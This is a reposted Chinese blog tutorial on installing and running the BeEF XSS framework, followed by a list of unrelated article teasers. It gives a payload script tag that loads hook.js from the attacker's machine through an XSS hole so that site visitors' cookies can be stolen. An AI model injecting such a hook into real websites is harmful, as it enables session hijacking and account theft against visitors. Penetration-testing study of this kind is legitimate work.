day07beef-xss之根据beef-xss获取cookies

day07beef-xss之根据beef-xss获取cookies

bicheng/2024/11/17 4:43:29/文章来源:https://blog.csdn.net/weixin_58189050/article/details/138232191

1.安装

apt-get update
apt-get install beef-xss

若报错运行不了尝试

apt remove ruby
apt remove beef-xss
apt-get install ruby
apt-get install ruby-dev libpcap-dev
gem install eventmachine
apt-get install beef-xss

2.运行

beef-xss

运行成功会自动弹出浏览框。

攻击代码:beef-xsx所在电脑的ip:3000/hook.js

<script src="http://192.168.190.141:3000/hook.js"></script>

结合xss漏洞可以获取cookies ，在beef-xss查看结果。

发送指令获取cookies

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.mzph.cn/bicheng/10122.shtml

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！

相关文章

提高Rust安装与更新的速度

提高Rust安装与更新的速度

一、背景因为rust安装过程中，默认的下载服务器为crates.io，这是一个国外的服务器，国内用户使用时，下载与更新的速度非常慢，因此，我们需要使用一个国内的服务器来提高下载与更新的速度。本文推荐使用字节…

阅读更多...

企业微信集成H5授权登录相关知识（二）

企业微信集成H5授权登录相关知识（二）

流程： 1.前端请求企业微信获取code：官网网页授权链接 2.企业微信返回的code请求后端判断是否已绑定系统账户 3.后端根据企业微信code，accessToken获得userId 4.userId获取user进行oauth2授权方式进行免密登录相关知识： 一&a…

阅读更多...

SS-PEG-SS可以与多种底物进行反应，生成具有良好稳定性的键合结构

SS-PEG-SS可以与多种底物进行反应，生成具有良好稳定性的键合结构

【试剂详情】英文名称 SS-PEG-SS 中文名称琥珀酰亚胺丁二酸酯-聚乙二醇-琥珀酰亚胺丁二酸酯外观性状由分子量决定，固体或者液体。分子量 0.4k，0.6k，1k，2k，3.4k，5k，10k（可…

阅读更多...

初识多线程

初识多线程

1. 前置知识——进程在学习多线程前需要了解操作系统中的基本知识，这里简单回顾下。 1.1 进程控制块一个进程对应着一个进程控制块PCB，PCB是一个用于管理和维护进程信息的数据结构，这个数据结构中大致包含下面内容（并不完整&…

阅读更多...

金仓面对面 | 人大金仓×安硕信息共话金融信用风险管理数字化转型之道

金仓面对面 | 人大金仓×安硕信息共话金融信用风险管理数字化转型之道

金仓面对面在数字化浪潮的推动下，人大金仓携手行业先锋，共同开启一场关于创新与转型的思想盛宴——金仓面对面。这不仅是一场对话，更是一次智慧的火花碰撞，一次行业数字化转型洞察的深度挖掘。行业精英汇聚：我们荣幸…

阅读更多...

云南区块链商户平台：抓包技术自制开票工具(二)

云南区块链商户平台：抓包技术自制开票工具(二)

前言上节我们分析了云南区块链商户平台的登录接口以及数据加密、解密，本节我们将构建一个项目框架，将大致的雏形制作出来说明由于我们使用开票软件都是在云南区块链商户平台上操作，如果再开发电脑端就显得没必要，思考良久&…

阅读更多...

在线旅游网站，基于 SpringBoot+Vue+MySQL 开发的前后端分离的在线旅游网站设计实现

在线旅游网站，基于 SpringBoot+Vue+MySQL 开发的前后端分离的在线旅游网站设计实现

目录一. 前言二. 功能模块 2.1. 登录界面 2.2. 管理员功能模块 2.3. 用户功能模块三. 部分代码实现四. 源码下载一. 前言随着科学技术的飞速发展，各行各业都在努力与现代先进技术接轨，通过科技手段提高自身的优势，旅游网站当然…

阅读更多...

分布式与集群的区别

分布式与集群的区别

先说区别： 分布式是并联工作的，集群是串联工作的。分布式中的每一个节点都可以做集群。而集群并不一定就是分布式的。集群举例：比如新浪网，访问的人很多，他可以做一个集群，前面放一个相应的服务器&…

阅读更多...

Covalent Network（CQT）通过 “新曙光” 计划实现重要里程碑，增强以太坊时光机，提供 30% 的年化质押收益率

Covalent Network（CQT）通过 “新曙光” 计划实现重要里程碑，增强以太坊时光机，提供 30% 的年化质押收益率

Covalent Network（CQT）作为集成超过 280 条区块链，并服务于超过 2.8 亿个钱包的领先结构化数据基础设施层，宣布了其战略计划 “新曙光” 中的一个重要进展。随着网络升级并完成了准备工作的 75%，这将为即将部署的以太坊…

阅读更多...

JUC下CountDownLatch详解

JUC下CountDownLatch详解

详细介绍 CountDownLatch是Java并发包java.util.concurrent中提供的一个同步工具类，它允许一个或多个线程等待其他线程完成操作后再继续执行。这个工具类基于一个计数器，计数器的初始值可以由构造函数设定。线程调用countDown()方法会将计数器减1&#x…

阅读更多...

uniapp——弹出键盘遮挡住输入框 textarea，处理方法

uniapp——弹出键盘遮挡住输入框 textarea，处理方法

案例在写输入框的时候会遇见键盘遮挡住部分textarea框的一部分，使用cursor-spacing处理即可修改后： 其他问题： 调起键盘输入时，不希望上方的内容被顶上去代码 <view class"commentBox" :style"botto…

阅读更多...

爬虫学习（4）每日一笑

爬虫学习（4）每日一笑

代码 import requests import re import osif __name__ "__main__":if not os.path.exists("./haha"):os.makedirs(./haha)url https://mlol.qt.qq.com/go/mlol_news/varcache_article?docid6321992422382570537&gameid3&zoneplat&webview…

阅读更多...

Linux 认识与学习Bash——3

Linux 认识与学习Bash——3

在Linux bash中，数据流重定向是指将命令的输出从默认的标准输出（通常是终端）重定向到其他位置，如文件或另一个命令的输入。这是通过使用特定的符号来实现的。例如，>用于将输出重定向到文件，而<用于将…

阅读更多...

Proxmox VE 8 用SDN隔离用户网络

Proxmox VE 8 用SDN隔离用户网络

作者：田逸（formyz） 最新发布的Proxmox VE（以下简称PVE） 8在Web管理后台集成了易于操作的SDN（软件定义网络）功能插件，其实质是对不同的PVE用户指定不同的网络，进行逻辑隔离…

阅读更多...

[移动通讯]【无线感知-P1】[从菲涅尔区模型到CSI模型-3][Mobius transformations-7】【Inversion】

[移动通讯]【无线感知-P1】[从菲涅尔区模型到CSI模型-3][Mobius transformations-7】【Inversion】

前言： mobius map 里面比较难的是inversion ，林菲尔德学院（Linfield College） Michael P. Hitchman. 有本书详细介绍一下该方向的一些原理，例子. Whitman College Book: 《Geometry with an Introduction to Cosmic T…

阅读更多...

el-select选项框内容过长

el-select选项框内容过长

利用popper-class实现选项框内容过长，截取显示功能： <el-select popper-class"popper-class" :popper-append-to-body"false" v-model"value" placeholder"请选择"><el-optionv-for"item in opt…

阅读更多...

初识 Linux线程

初识 Linux线程

再学习完Linux进程后,本期,我们来讲解Linux线程 1.为什么需要线程在之前学习进程前,我们写的所有代码几乎都是单个执行流的,也就是说我们的代码只有一条路走. 在学习进程后,我们可以通过fork进行进程创建,给进程分配任务进行多执行流执行任务,问题来了那我们为什么还需要…

阅读更多...

清空回收站是彻底删除吗？一文解答你的疑问！

“我刚刚本来想在回收站中恢复一个文件的，但是一不小心就清空了回收站，想问问清空回收站是彻底删除吗？清空了回收站文件还有机会找回吗？” 在使用电脑的过程中，我们经常会将不再需要的文件或文件夹移动到回收站&#x…

阅读更多...

数据结构与算法学习笔记六-二叉树的顺序存储表示法和实现(C语言)

数据结构与算法学习笔记六-二叉树的顺序存储表示法和实现(C语言)

目录前言 1.数组和结构体相关的一些知识 1.数组 2.结构体数组 3.递归遍历数组 2.二叉树的顺序存储表示法和实现 1.定义 2.初始化 3.先序遍历二叉树 4.中序遍历二叉树 5.后序遍历二叉树 6.完整代码前言二叉树的非递归的表示和实现。 1.数组和结构体相关的一些知…

阅读更多...

AUTOSAR OS调度表讲解

AUTOSAR OS调度表讲解

调度表 AUTOSAR OS通过调度表（Schedule Table）来解决一个alarm只能激活一个任务的限制。调度表是预定义的行为序列，通过到期点实现。AUTOSAR OS遍历调度表并依次处理每个到期点，遍历由底层的counter来实现驱动。到期点发生在从概念零开始的静态配置偏移量上。偏移量在静…

阅读更多...

推荐文章

最新文章